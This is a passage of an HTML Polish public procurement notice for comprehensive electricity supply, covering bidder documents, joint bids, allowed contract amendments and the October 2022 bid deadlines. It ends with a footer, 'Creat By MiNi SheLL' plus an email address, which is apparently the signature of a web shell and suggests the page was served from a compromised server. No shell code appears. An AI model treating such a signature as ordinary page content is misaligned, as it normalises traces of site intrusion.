działalności gospodarczej zamawiający żąda dokumentów:<br/>a) ważnej Koncesji w zakresie obrotu energią elektryczną wydanej przez Prezesa Urzędu Regulacji<br/>Energetyki<br/>oraz<br/>b) ważnej Koncesji w zakresie dystrybucji energii elektrycznej wydanej przez Prezesa Urzędu Regulacji<br/>Energetyki), lub (jeżeli wykonawca nie jest właścicielem sieci dystrybucyjnej) Oświadczenia (wg wzorca<br/>stanowiącego Załącznik nr 6 do SWZ) o posiadaniu ważnej Umowy zawartej z Operatorem Systemu<br/>Dystrybucyjnego umożliwiającej świadczenie usługi kompleksowej do punktów poboru opisanych w<br/>Załączniku nr 1 do SWZ, w tym w zakresie dystrybucji energii elektrycznej wytworzonej w<br/>mikroinstalacji.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Zamawiający żąda od wykonawcy, który polega na zdolnościach technicznych lub zawodowych<br/>lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby na zasadach<br/>określonych w art.118 ustawy Pzp, przedstawienia podmiotowych środków dowodowych, o<br/>których mowa w §2 ust.1 pkt 1 lit. a i b oraz pkt 6 i 7 lit. a, b, c, d Rozporządzenia MRPiT,<br/>dotyczących tych podmiotów, potwierdzających, że nie zachodzą wobec tych podmiotów<br/>podstawy wykluczenia z postępowania.<br/>10. Do Oferty należy załączyć<br/>1) Formularz Oferty wg wzoru stanowiącego Załącznik nr 2 i 2a do SWZ<br/>1) Oświadczenie (art. 125 ust 1 Pzp wg wzoru stanowiącego Załącznik nr 3.1 do SWZ) oraz, o<br/>ile dotyczy, oświadczenie podmiotu udostępniającego zasoby wg wzoru stanowiącego Załącznik<br/>nr 3.2. do SWZ<br/>2) (o ile dotyczy) Pełnomocnictwo do reprezentowania wykonawców występujących wspólnie<br/>3) (o ile dotyczy) Pełnomocnictwo do reprezentowania wykonawcy, jeżeli w imieniu wykonawcy<br/>działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów<br/>rejestrowych (KRS, CEDiG)<br/>*Pełnomocnictwo pod rygorem nieważności przekazuje się w postaci elektronicznej i opatruje<br/>kwalifikowanym podpisem elektronicznym bądź podpisem zaufanym lub podpisem osobistym.<br/>Jeżeli dokument sporządzony został jako dokument w postaci papierowej i opatrzony<br/>własnoręcznym podpisem, wykonawca składa cyfrowe odwzorowanie dokumentu opatrzone<br/>kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/>Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej<br/>dokonuje mocodawca lub notariusz (§7 Rozporządzenia MRPiT)<br/>4) (o ile dotyczy) Zobowiązanie podmiotu udostępniającego zasoby do oddania mu do<br/>dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny<br/>podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów<br/>5) (o ile dotyczy) Oświadczenie, o którym mowa w art. 117 ust.4 Pzp – według Załącznika nr 4<br/>do SWZ.<br/>6) (o ile dotyczy) Oryginał wniesienia wadium, jeżeli zabezpieczenie wadialne zostało wniesione<br/>w formie niepieniężnej. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego.<br/>Zgodnie z treścią art. 117 ust. 2 ustawy Pzp warunek dotyczący uprawnień do prowadzenia<br/>określonej działalności gospodarczej lub zawodowej, o którym mowa w pkt 2 powyżej, jest<br/>spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej i to on zrealizuje kompleksową dostawę energii elektrycznej (wg wzoru stanowiącego<br/>Załącznik nr 4 do SWZ. W takim przypadku wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia dołączają do oferty oświadczenie, z którego wynika, który z wykonawców<br/>realizować będzie przedmiot zamówienia.<br/>Warunek zostanie spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności<br/>gospodarczej lub zawodowej i to on zrealizuje kompleksową dostawę energii elektrycznej.<br/>Zgodnie z treścią art. 117 ust. 2 ustawy Pzp warunek dotyczący uprawnień do prowadzenia<br/>określonej działalności gospodarczej lub zawodowej, o którym mowa w pkt 2 powyżej, jest<br/>spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej i to on zrealizuje kompleksową dostawę energii elektrycznej (wg wzoru stanowiącego<br/>Załącznik nr 4 do SWZ. W takim przypadku wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia dołączają do oferty oświadczenie, z którego wynika, który z wykonawców<br/>realizować będzie przedmiot zamówienia.<br/>Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego.<br/>Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia.<br/>Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w<br/>stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać<br/>na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej<br/>podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi<br/>stosunków prawnych.<br/>8. Zgodnie z § 6 ust. 3 Rozporządzenia PRM poświadczenia zgodności cyfrowego<br/>odwzorowania z dokumentem w postaci papierowej dokonuje w przypadku:<br/>1) podmiotowych środków dowodowych oraz dokumentów potwierdzających umocowanie do<br/>reprezentowania - odpowiednio wykonawca, wykonawca wspólnie ubiegający się o udzielenie<br/>zamówienia, w zakresie podmiotowych środków dowodowych lub dokumentów<br/>potwierdzających umocowanie do reprezentowania, które każdego z nich dotyczą<br/>2) innych dokumentów - odpowiednio wykonawca lub wykonawca wspólnie ubiegający się o<br/>udzielenie zamówienia, w zakresie dokumentów, które każdego z nich dotyczą.<br/>1. W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia, wykonawcy<br/>zobowiązani są do przedłożenia zamawiającemu, przed udzieleniem zamówienia, umowy<br/>pomiędzy wykonawcami regulującej warunki realizacji zamówienia publicznego.2. W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego<br/>reprezentowanych przez Pełnomocnika, niezbędne jest przedstawienie pełnomocnictwa do<br/>podpisania umowy, o ile załączone do oferty pełnomocnictwo nie uwzględniało tej czynności<br/>prawnej.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ponoszą solidarną odpowiedzialność za wykonanie umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zgodnie z treścią art. 455 ustawy Pzp zamawiający dopuszcza następujące zmiany w<br/>umowie:<br/>1) Zmiana jednostkowej stawki i lub ceny za 1 kWh wyłącznie w przypadku:<br/>a) ustawowej zmiany stawki podatku VAT i/lub<br/>b) ustawowej zmiany opodatkowania energii elektrycznej podatkiem akcyzowym<br/>wyłącznie o kwotę wynikającą ze zmiany tych stawek<br/>Zmiany, o których mowa w pkt 1) litera a i b obowiązywać będą od dnia wejścia w życie<br/>stosownych przepisów i nie wymagają zmiany Umowy (Aneksu).<br/>c) zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust.3-<br/>5 ustawy z dnia 10.10.2002r. o minimalnym wynagrodzeniu za pracę<br/>d) zmiany zasad podleganiu ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub<br/>wysokości stawki składki na ubezpieczenia społeczne i zdrowotne<br/>e) zmiany zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o<br/>których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych<br/>wyłącznie o kwotę wynikającą ze zmiany tych stawek<br/>Zmiany, o których mowa w pkt 1) litera c, d i e obowiązywać będą od dnia zawarcia przez Strony<br/>stosownego Aneksu. Warunkiem przystąpienia przez Zamawiającego do Aneksu jest<br/>udokumentowanie przez Wykonawcę wpływu przedmiotowych zmian na koszty wykonania<br/>przedmiotu niniejszej umowy, w szczególności Wykonawca zobowiązany jest przedłożyć<br/>Zamawiającemu dokumenty wskazujące na wzrost wynagrodzeń (w wyniku przedmiotowych<br/>zmian) osób biorących bezpośredni udział w realizacji zamówienia oraz wykazać wpływ wzrostu<br/>kosztów wynagrodzeń na wzrost kosztów realizacji niniejszej umowy.<br/>2) Zmiany ilości punktów poboru energii wskazanych w Załączniku nr 1 do Umowy, przy czym<br/>zmiana ilości punktów poboru energii elektrycznej wynikać może np. z włączenia punktów<br/>poboru, z likwidacji punktu poboru z eksploatacji w okresie trwania Umowy lub zmiany stanu<br/>prawnego punktu poboru (w tym przejęcia), zmiany w zakresie odbiorcy, zaistnienia przeszkód<br/>prawnych i formalnych uniemożliwiających przeprowadzenie procedury zmiany sprzedawcy, w<br/>tym w przypadku zaistnienia przeszkód uniemożliwiających rozwiązanie dotychczas<br/>obowiązujących umów. Przy czym zwiększenie ilości punktów poboru możliwe jest jedynie w<br/>obrębie grup taryfowych, które zostały ujęte w SWZ, zwiększenie ilości punktów poboru nie<br/>może spowodować zwiększenia ilości poboru energii elektrycznej o ponad 15% wolumenu<br/>szacowanego. Zamawiający deklaruje pobór energii na poziomie nie mniejszym niż 85%<br/>wolumenu wskazanego w §2 ust.1 Umowy.<br/>3) Zmiany kosztów (stawek, opłat) dystrybucji energii elektrycznej w przypadku zatwierdzenia<br/>przez Prezesa URE nowej Taryfy usług dystrybucji, o kwoty wynikające z tej zmiany. Zmiana w<br/>zakresie kosztów dystrybucji nie wymaga zmiany Umowy i obowiązywać będzie od dnia wejścia<br/>w życie Taryfy.2. Zmiana łącznego wynagrodzenie brutto Wykonawcy określonego w §7 o ile zajdą okoliczności<br/>(łącznie lub rozdzielnie) opisane w ust.1 niniejszego paragrafu.<br/>3. Zmiany obowiązujących przepisów, jeżeli zgodnie z nimi konieczne będzie dostosowanie<br/>treści Umowy do aktualnego stanu prawnego. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-10-28 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-10-28 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com